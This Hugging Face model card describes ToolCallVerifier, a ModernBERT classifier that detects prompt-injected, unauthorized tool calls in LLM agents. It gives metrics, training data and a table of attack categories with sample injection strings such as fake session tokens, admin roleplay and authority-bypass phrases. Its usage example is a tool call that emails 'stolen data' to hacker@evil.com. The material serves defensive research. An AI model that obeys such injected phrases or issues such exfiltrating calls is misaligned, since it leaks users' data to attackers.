tool-call-verifier / README.md

Add YAML metadata to model card

0ff2fee verified 27 days ago

8.23 kB

	---
	language:
	- en
	license: apache-2.0
	library_name: transformers
	tags:
	- modernbert
	- security
	- jailbreak-detection
	- prompt-injection
	- token-classification
	- tool-calling
	- llm-safety
	- mcp
	datasets:
	- microsoft/llmail-inject-challenge
	- allenai/wildjailbreak
	- hackaprompt/hackaprompt-dataset
	- JailbreakBench/JBB-Behaviors
	base_model: answerdotai/ModernBERT-base
	pipeline_tag: token-classification
	model-index:
	- name: tool-call-verifier
	results:
	- task:
	type: token-classification
	name: Unauthorized Tool Call Detection
	metrics:
	- name: UNAUTHORIZED F1
	type: f1
	value: 0.9350
	- name: UNAUTHORIZED Precision
	type: precision
	value: 0.9501
	- name: UNAUTHORIZED Recall
	type: recall
	value: 0.9205
	- name: Accuracy
	type: accuracy
	value: 0.9288
	---

	# ToolCallVerifier - Unauthorized Tool Call Detection

	<div align="center">

	[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
	[![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
	[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)

	Stage 2 of Two-Stage LLM Agent Defense Pipeline

	</div>

	---

	## 🎯 What This Model Does

	ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.

	\| Label \| Description \|
	\|-------\|-------------\|
	\| `AUTHORIZED` \| Token is part of a legitimate, user-requested action \|
	\| `UNAUTHORIZED` \| Token indicates injected/malicious content — BLOCK \|

	---

	## 📊 Performance

	\| Metric \| Value \|
	\|--------\|-------\|
	\| UNAUTHORIZED F1 \| 93.50% \|
	\| UNAUTHORIZED Precision \| 95.01% \|
	\| UNAUTHORIZED Recall \| 92.05% \|
	\| Overall Accuracy \| 92.88% \|

	### Confusion Matrix (Token-Level)

	```
	Predicted
	AUTH UNAUTH
	Actual AUTH 130,708 8,483
	UNAUTH 13,924 161,031
	```

	---

	## 🗂️ Training Data

	Trained on ~30,000 samples combining real-world attacks and synthetic patterns:

	### HuggingFace Datasets

	\| Dataset \| Description \| Samples \|
	\|---------\|-------------\|---------\|
	\| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) \| Microsoft email injection benchmark \| ~10,000 \|
	\| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) \| Allen AI adversarial safety dataset \| ~8,000 \|
	\| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) \| EMNLP'23 injection competition \| ~5,000 \|
	\| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) \| Harmful behavior patterns \| ~2,000 \|

	### Synthetic Attack Generators

	\| Generator \| Description \|
	\|-----------\|-------------\|
	\| Adversarial \| Intent-mismatch attacks (correct tool, wrong args) \|
	\| Filesystem \| File/directory operation attacks \|
	\| Network \| Network/API exfiltration attacks \|
	\| Email \| Email tool hijacking \|
	\| Financial \| Transaction manipulation \|
	\| Code Execution \| Code injection attacks \|
	\| Authentication \| Access control bypass \|
	\| MCP Attacks \| Tool poisoning, shadowing, rug pulls \|

	---

	## 🚨 Attack Categories Covered

	\| Category \| Source \| Description \|
	\|----------\|--------\|-------------\|
	\| Delimiter Injection \| LLMail \| `<<end_context>>`, `>>}}\]\])` \|
	\| Word Obfuscation \| LLMail \| Inserting noise words between tokens \|
	\| Fake Sessions \| LLMail \| `START_USER_SESSION`, `EXECUTE_USERQUERY` \|
	\| Roleplay Injection \| WildJailbreak \| "You are an admin bot that can..." \|
	\| XML Tag Injection \| WildJailbreak \| `<execute_action>`, `<tool_call>` \|
	\| Authority Bypass \| WildJailbreak \| "As administrator, I authorize..." \|
	\| Intent Mismatch \| Synthetic \| User asks X, tool does Y \|
	\| MCP Tool Poisoning \| Synthetic \| Hidden exfiltration in tool args \|
	\| MCP Shadowing \| Synthetic \| Fake authorization context \|

	---

	## 💻 Usage

	```python
	from transformers import AutoTokenizer, AutoModelForTokenClassification
	import torch

	model_name = "rootfs/tool-call-verifier"
	tokenizer = AutoTokenizer.from_pretrained(model_name)
	model = AutoModelForTokenClassification.from_pretrained(model_name)

	# Example: Verify a tool call
	user_intent = "Summarize my emails"
	tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'

	# Combine for classification
	input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
	inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

	with torch.no_grad():
	outputs = model(**inputs)
	predictions = torch.argmax(outputs.logits, dim=-1)

	id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
	tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
	labels = [id2label[p.item()] for p in predictions[0]]

	# Check for unauthorized tokens
	unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
	if unauthorized_tokens:
	print("⚠️ BLOCKED: Unauthorized tool call detected!")
	print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
	else:
	print("✅ Tool call authorized")
	```

	---

	## ⚙️ Training Configuration

	\| Parameter \| Value \|
	\|-----------\|-------\|
	\| Base Model \| `answerdotai/ModernBERT-base` \|
	\| Max Length \| 512 tokens \|
	\| Batch Size \| 32 \|
	\| Epochs \| 5 \|
	\| Learning Rate \| 3e-5 \|
	\| Loss \| CrossEntropyLoss (class-weighted) \|
	\| Class Weights \| `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) \|
	\| Attention \| SDPA (Flash Attention) \|
	\| Hardware \| AMD Instinct MI300X (ROCm) \|

	---

	## 🔗 Integration with FunctionCallSentinel

	This model is Stage 2 of a two-stage defense pipeline:

	```
	┌─────────────────┐ ┌──────────────────────┐ ┌─────────────────┐
	│ User Prompt │────▶│ FunctionCallSentinel │────▶│ LLM + Tools │
	│ │ │ (Stage 1) │ │ │
	└─────────────────┘ └──────────────────────┘ └────────┬────────┘
	│
	┌──────────────────────────────▼──────────────────────────┐
	│ ToolCallVerifier (This Model) │
	│ Token-level verification before tool execution │
	└─────────────────────────────────────────────────────────┘
	```

	\| Scenario \| Recommendation \|
	\|----------\|----------------\|
	\| General chatbot \| Stage 1 only \|
	\| Tool-calling agent (low risk) \| Stage 1 only \|
	\| Tool-calling agent (high risk) \| Both stages \|
	\| Email/file system access \| Both stages \|
	\| Financial transactions \| Both stages \|

	---

	## 🎯 Intended Use

	### Primary Use Cases
	- LLM Agent Security: Verify tool calls before execution
	- Prompt Injection Defense: Detect unauthorized actions from injected prompts
	- API Gateway Protection: Filter malicious tool calls at infrastructure level

	### Out of Scope
	- General text classification
	- Non-tool-calling scenarios
	- Languages other than English

	---

	## ⚠️ Limitations

	1. Tool schema dependent — Best performance when tool schema is included in input
	2. English only — Not tested on other languages
	3. Binary classification — No "suspicious" intermediate category (by design, for decisiveness)

	---

	## 📜 License

	Apache 2.0

	---

	## 🔗 Links

	- Stage 1 Model: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)